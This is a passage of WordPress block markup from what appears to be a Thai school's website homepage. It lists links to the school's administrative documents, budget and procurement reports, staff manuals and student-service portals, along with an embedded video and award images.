data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> รางวัล\"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล\"ด้านผลงานวิชาการที่เป็นเลิศ\"<img class=\"wp-image-538\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 